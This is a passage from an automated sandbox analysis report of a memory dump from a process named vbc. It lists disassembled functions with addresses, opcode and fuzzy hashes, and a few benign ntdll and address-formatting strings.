                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4a75c8136ed91f106d15d26d799fc652ffa791fce59d33a7881c061e7387fc9
                                                                • Instruction ID: 80f7bce9534f3a3eb0ed3fd47a97bc5fa9794a89064f5932f72cc34e03c8fd90
                                                                • Opcode Fuzzy Hash: a4a75c8136ed91f106d15d26d799fc652ffa791fce59d33a7881c061e7387fc9
                                                                • Instruction Fuzzy Hash: 3890023224191402D14175584845606001997D0241FD5C012A0424758F8E558B56EE61
                                                                Function 05612C60 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b92a3f60f0ca12c64f2664c71a5bacf0b792028add4903504b1aa8d1960874bd
                                                                • Instruction ID: a186ba6f92579d9dbb77dcb1934d98014bcd6c9a625e697469c753e9266b9fa0
                                                                • Opcode Fuzzy Hash: b92a3f60f0ca12c64f2664c71a5bacf0b792028add4903504b1aa8d1960874bd
                                                                • Instruction Fuzzy Hash: 0690023220191842D10075584845B46001587E0301F95C016A0124758E8E15C951B921
                                                                Function 05612CF0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf47eeca01bd5ab8e59d3466afbe8f61bbb4b3a5a5cba66749a2b152324c1931
                                                                • Instruction ID: 2ec13b2abc4c5b033c1b88ab842e98dcb1d7da5009616779ce742a9f6d5fba41
                                                                • Opcode Fuzzy Hash: bf47eeca01bd5ab8e59d3466afbe8f61bbb4b3a5a5cba66749a2b152324c1931
                                                                • Instruction Fuzzy Hash: 4390023220191403D10075585949707001587D0201F95D411A042475CEDE568951A521
                                                                Function 05612CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 98abac8d316c85e3fcb09ac37c84d0f602174d0e35f305c798cb21ac648440a4
                                                                • Instruction ID: fcb53ff8d56113ea17ed69b389deff32555676298e3deb03281485c26329e5a4
                                                                • Opcode Fuzzy Hash: 98abac8d316c85e3fcb09ac37c84d0f602174d0e35f305c798cb21ac648440a4
                                                                • Instruction Fuzzy Hash: 1690022260591402D14075585859706002587D0201F95D011A0024758ECE598B55AAA1
                                                                Function 05612CA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b8b49422fbffe0e38e4141565c0082c729060a39d7094937129336b1b0fc5edf
                                                                • Instruction ID: a88b289c717752f80b17e5d1d9874faff1a95cbdb05e8cbc05772e2a7d1dbc20
                                                                • Opcode Fuzzy Hash: b8b49422fbffe0e38e4141565c0082c729060a39d7094937129336b1b0fc5edf
                                                                • Instruction Fuzzy Hash: 1A90023220191402D10079985849646001587E0301F95D011A5024759FCE658991A531
                                                                Function 05612F60 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0470ee059b44832e742eb503cba4318f880fdfad9ee5db0ff83330653ead9f57
                                                                • Instruction ID: e6201134ac993c296e34d7e8839666c56a6d0b29d9d8ddbb5dc758c07d759577
                                                                • Opcode Fuzzy Hash: 0470ee059b44832e742eb503cba4318f880fdfad9ee5db0ff83330653ead9f57
                                                                • Instruction Fuzzy Hash: 2490026221191042D10475584845706005587E1201F95C012A2154758DCD298D619525
                                                                Function 05612F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2aa298fb206c5309967782f0b869ad75e138cb4ce3f4c6cd00bd450f79e84f78
                                                                • Instruction ID: 0b4027c2bbc2711004137ba6ede9821ea0a3fff8578dee150c559111694d20d1
                                                                • Opcode Fuzzy Hash: 2aa298fb206c5309967782f0b869ad75e138cb4ce3f4c6cd00bd450f79e84f78
                                                                • Instruction Fuzzy Hash: F490026234191442D10075584855B060015C7E1301F95C015E1064758E8E19CD52A526
                                                                Function 05612FE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb90f19e970fa5c494c46ade000821050d2904709c2b890d85fbde49cd2fe1de
                                                                • Instruction ID: 23b96d374db3f378100053bf7261721a7c9d4e04aa8a797630bbe029191a7a36
                                                                • Opcode Fuzzy Hash: eb90f19e970fa5c494c46ade000821050d2904709c2b890d85fbde49cd2fe1de
                                                                • Instruction Fuzzy Hash: F3900222211D1042D20079684C55B07001587D0303F95C115A0154758DCD1589619921
                                                                Function 05612FA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0339db0bcec0ceb80c5782558076eb4d48511104c0c0760032bce50f138f180
                                                                • Instruction ID: b3015ecc848d935e24a0fe2888c725fe1fe23430ee260b086c456db53522f3f2
                                                                • Opcode Fuzzy Hash: c0339db0bcec0ceb80c5782558076eb4d48511104c0c0760032bce50f138f180
                                                                • Instruction Fuzzy Hash: 74900232201D1402D10075584C49747001587D0302F95C011A5164759F8E65C991A931
                                                                Function 05612FB0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 208377d0bfc5c36ca7a637b2f4d15bcae78e35ef7f260c6a7364060fcfea7a0a
                                                                • Instruction ID: 05862714357635e9c1cb0c91b126b033be53e163a3601644bfd1f21e35fd33b8
                                                                • Opcode Fuzzy Hash: 208377d0bfc5c36ca7a637b2f4d15bcae78e35ef7f260c6a7364060fcfea7a0a
                                                                • Instruction Fuzzy Hash: 9890022260191042414075688C859064015ABE1211795C121A0998754E8D5989659A65
                                                                Function 05612F90 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54ceaf8607d774ac2e96035f180cc56e7eb3fea5f69ac78aaa54c14ebebb83cd
                                                                • Instruction ID: e0f0138333b4f34750f928d71d950f521013dc64113540cac58ee97a31371ad8
                                                                • Opcode Fuzzy Hash: 54ceaf8607d774ac2e96035f180cc56e7eb3fea5f69ac78aaa54c14ebebb83cd
                                                                • Instruction Fuzzy Hash: 67900232201D1402D10075584C5570B001587D0302F95C011A1164759E8E258951A971
                                                                Function 05612E30 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a361070b9ddcdf0965e570676747573d012f0ea9e6965c033548730f74c921c0
                                                                • Instruction ID: 2725dfa9c6368c9f56eba509f33b4073e8d999bba10159208337ef7acf83c890
                                                                • Opcode Fuzzy Hash: a361070b9ddcdf0965e570676747573d012f0ea9e6965c033548730f74c921c0
                                                                • Instruction Fuzzy Hash: B690022230191402D102755848556060019C7D1345FD5C012E1424759E8E258A53E532
                                                                Function 05612EE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f507caa56fb27a1b7d3692930346eae6cb069ede87694e3aef142616291c349
                                                                • Instruction ID: 19e4afcd1f8ab4e6f589be3d28b2a65decd53ae722dbed2e2b1e30591478b6fb
                                                                • Opcode Fuzzy Hash: 3f507caa56fb27a1b7d3692930346eae6cb069ede87694e3aef142616291c349
                                                                • Instruction Fuzzy Hash: 71900262201D1403D14079584C45607001587D0302F95C011A2064759F8E298D51A535
                                                                Function 05612EA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 011748e26750a68bcf8962441784c4abbc6476b243005cecf8b91d8003635da0
                                                                • Instruction ID: ee910141918acf4c831fb6c4db9286ffec496ad3ee2fe2b97bacc1beefdc9f29
                                                                • Opcode Fuzzy Hash: 011748e26750a68bcf8962441784c4abbc6476b243005cecf8b91d8003635da0
                                                                • Instruction Fuzzy Hash: 7D90027220191402D14075584845746001587D0301F95C011A5064758F8E598ED5AA65
                                                                Function 05612E80 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7be2412ce467ee3b56e167b24cfefe25c5c244d0ff11cc16611384a62842b39
                                                                • Instruction ID: 658dd7b6c0e19c2ec4a47a91af2503ebd83ddd690982bd8202029a07b10b4f5d
                                                                • Opcode Fuzzy Hash: e7be2412ce467ee3b56e167b24cfefe25c5c244d0ff11cc16611384a62842b39
                                                                • Instruction Fuzzy Hash: B190022260191502D10175584845616001A87D0241FD5C022A1024759FCE258A92E531
                                                                Function 05612BE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1ace68a1f059026573e716ddf20bdb07b552c438beea3ebda24cf26d0877102
                                                                • Instruction ID: e8c3e84905cf673c0e2403459948afa36121e69f3abe158061c2389b0ecec878
                                                                • Opcode Fuzzy Hash: c1ace68a1f059026573e716ddf20bdb07b552c438beea3ebda24cf26d0877102
                                                                • Instruction Fuzzy Hash: 9890023220595842D14075584845A46002587D0305F95C011A0064798E9E258E55FA61
                                                                Function 05612BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a3789bf97454350fc68cbedd334ddcbe8b3628fc290e85543b4b5c7c4c0b640
                                                                • Instruction ID: bd1f9fd6e40d529a242f69cb63fa191a90ef1827ffb3867c64cf11aa48127f5a
                                                                • Opcode Fuzzy Hash: 1a3789bf97454350fc68cbedd334ddcbe8b3628fc290e85543b4b5c7c4c0b640
                                                                • Instruction Fuzzy Hash: 9590023220191802D1807558484564A001587D1301FD5C015A0025758ECE158B59BBA1
                                                                Function 05612BA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ae280389e7e6703219cee058929dd4c3b5c48b013720fb989bb4dd05a419556
                                                                • Instruction ID: 6ddf71971e408c219ffd6f73ee33cc73c3a3de233c10c4eff94ff9d4937d1d09
                                                                • Opcode Fuzzy Hash: 9ae280389e7e6703219cee058929dd4c3b5c48b013720fb989bb4dd05a419556
                                                                • Instruction Fuzzy Hash: 9A90023260591802D15075584855746001587D0301F95C011A0024758E8F558B55BAA1
                                                                Function 05612B80 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8588b8ab6b8df8deeb5c090e9f126b28a08d7cc4677c3ec42c88204549242b1f
                                                                • Instruction ID: 880296d722157365ce88fef889d92f622f036a67829ae1a85c5b4ad39ac6c683
                                                                • Opcode Fuzzy Hash: 8588b8ab6b8df8deeb5c090e9f126b28a08d7cc4677c3ec42c88204549242b1f
                                                                • Instruction Fuzzy Hash: BE90023220191802D10475584C45686001587D0301F95C011A6024759F9E658991B531
                                                                Function 05612AF0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 76c6c704e6524c8b9c7701f5d37fd8a011f74813626def8748d33cb6dae7d116
                                                                • Instruction ID: d45f99563fcefff0ea0d5552af47623796df6eefe4db65f1541cbed48d24cb40
                                                                • Opcode Fuzzy Hash: 76c6c704e6524c8b9c7701f5d37fd8a011f74813626def8748d33cb6dae7d116
                                                                • Instruction Fuzzy Hash: 82900226221910020145B9580A4550B045597D63513D5C015F1416794DCE2189659721
                                                                Function 05612AD0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0937e124abc96b511e11067e4015b933b7e05ef354aa2ed833b09bd79e90eb59
                                                                • Instruction ID: d9c0478968f2a712ece8b8beab326ed69ca0762eeda680f65d7ac4dc9e548ef8
                                                                • Opcode Fuzzy Hash: 0937e124abc96b511e11067e4015b933b7e05ef354aa2ed833b09bd79e90eb59
                                                                • Instruction Fuzzy Hash: A3900226211910030105B9580B45507005687D5351395C021F1015754DDE2189619521
                                                                Function 05612AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e9c216d2e186a1d5269ef256cfcef6bbf68290086daf3e8bcbcf7ca121b5271
                                                                • Instruction ID: 8dab12489efe5ee81d140174c00c738bbdf062e454a81894739546b3e18ae364
                                                                • Opcode Fuzzy Hash: 2e9c216d2e186a1d5269ef256cfcef6bbf68290086daf3e8bcbcf7ca121b5271
                                                                • Instruction Fuzzy Hash: 839002A2201A50924500B6588845B0A451587E0201B95C016E1054764DCD258951D535
                                                                Function 05613010 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7dbba482e32d1174e8a33ee05e30fc00af005da2819fb73cd659747c854fa7fa
                                                                • Instruction ID: 715b3e831c422dfb1e086853d7617bdca4fcb5a99c4eea6807b3214e291f1331
                                                                • Opcode Fuzzy Hash: 7dbba482e32d1174e8a33ee05e30fc00af005da2819fb73cd659747c854fa7fa
                                                                • Instruction Fuzzy Hash: 0A900222201D5442D14076584C45B0F411587E1202FD5C019A4156758DCD1589559B21
                                                                Function 05613090 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a2bc4930ff20d4eb3119a6dcf0d5aa467da40521dea1711710bca91ff61be26
                                                                • Instruction ID: e8952f9ab658ede3086450174c7801790953ecad8e5750c041077c4abe9135a8
                                                                • Opcode Fuzzy Hash: 1a2bc4930ff20d4eb3119a6dcf0d5aa467da40521dea1711710bca91ff61be26
                                                                • Instruction Fuzzy Hash: BD90022224191802D140755888557070016C7D0601F95C011A0024758E8E168A65AAB1
                                                                Function 05613D70 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46a1ba5da9f910dd1358598e607280663047f8824cbe5f90d707a6a4114c4378
                                                                • Instruction ID: f619b0ca1bb6d3e13ff731c0b5f908f334dcc2269f8c8337e98b31ae6c52d9f3
                                                                • Opcode Fuzzy Hash: 46a1ba5da9f910dd1358598e607280663047f8824cbe5f90d707a6a4114c4378
                                                                • Instruction Fuzzy Hash: E290023620191402D51075585C45646005687D0301F95D411A042475CE8E5489A1E521
                                                                Function 05613D10 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17eb9f4312a29237d639da08fda40400ddee46778987579546e0e8e7c57c6d39
                                                                • Instruction ID: 660249198e5af3a85ce4c137e1f2c7da8749a47d69df1deb0a4ba7a1f63b2985
                                                                • Opcode Fuzzy Hash: 17eb9f4312a29237d639da08fda40400ddee46778987579546e0e8e7c57c6d39
                                                                • Instruction Fuzzy Hash: CD90023220291142954076585C45A4E411587E1302BD5D415A0015758DCD1489619621
                                                                Function 056139B0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e4e7a2fdf490b2aa233bca40d3b377515ce572645b68e9bf75f78e9d1be40e09
                                                                • Instruction ID: f87404d2666c7797fb4f39f12a9928f5f8281830fbecd98df0149111ce6dc9e9
                                                                • Opcode Fuzzy Hash: e4e7a2fdf490b2aa233bca40d3b377515ce572645b68e9bf75f78e9d1be40e09
                                                                • Instruction Fuzzy Hash: B390022224596102D150755C48456164015A7E0201F95C021A0814798E8D558955A621
                                                                Function 05612C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction ID: 6bb265527da45e89a24210c55409dd48f9a8a8ebe6c64c85ba73b0202358dcbc
                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction Fuzzy Hash:
                                                                Function 05612890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: e9b61ce6a7188e01f09834d08b9464509a89ce63db43e00356385dac7e8b116d
                                                                • Instruction ID: cc50e4fac3b2ccf84e96ca7f4c0e6f27e9f3cb2d721fccc014d63afa025364fe
                                                                • Opcode Fuzzy Hash: e9b61ce6a7188e01f09834d08b9464509a89ce63db43e00356385dac7e8b116d
                                                                • Instruction Fuzzy Hash: 5A5139BAA04156BFCB10DF9EC99097EFBB9BB08200754C569E865D7641E634DE00CBE4
                                                                Function 05682410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: d7f69b03a66dc96f9701b9b80283eaf5b1ff680eaae7f6c1409fa9fcbfa59bfb
                                                                • Instruction ID: b4134b59eab0df60b85235f3b7a59a60dd58d180eab70247c84b505caeaba99d
                                                                • Opcode Fuzzy Hash: d7f69b03a66dc96f9701b9b80283eaf5b1ff680eaae7f6c1409fa9fcbfa59bfb
                                                                • Instruction Fuzzy Hash: 1351F679A40645AECB30EF9CC8A097FB7FABF48200B448A5DE496D7B41D674DA44C760
                                                                Function 05607630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05644725
                                                                • ExecuteOptions, xrefs: 056446A0
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 05644787
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05644742
                                                                • Execute=1, xrefs: 05644713
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05644655
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 056446FC
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: 53be8a9138aac9c9942587fa6b76bc49f70a45c344fd3fb9e88905cd70c81d2f
                                                                • Instruction ID: 46e6ab3e1fe85fa626b90e8625e0a206830445c26c28780acadbe87c89675900
                                                                • Opcode Fuzzy Hash: 53be8a9138aac9c9942587fa6b76bc49f70a45c344fd3fb9e88905cd70c81d2f
                                                                • Instruction Fuzzy Hash: B0510A717402197ADF14DAA4DC5AFBB77A9FF04301F140499E506A72C0DB71EA81CF54
                                                                Function 056A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                • Instruction ID: c38edb993469cf07115f45819fc5aace43d93dfa9db25c3999278cfe60cba772
                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
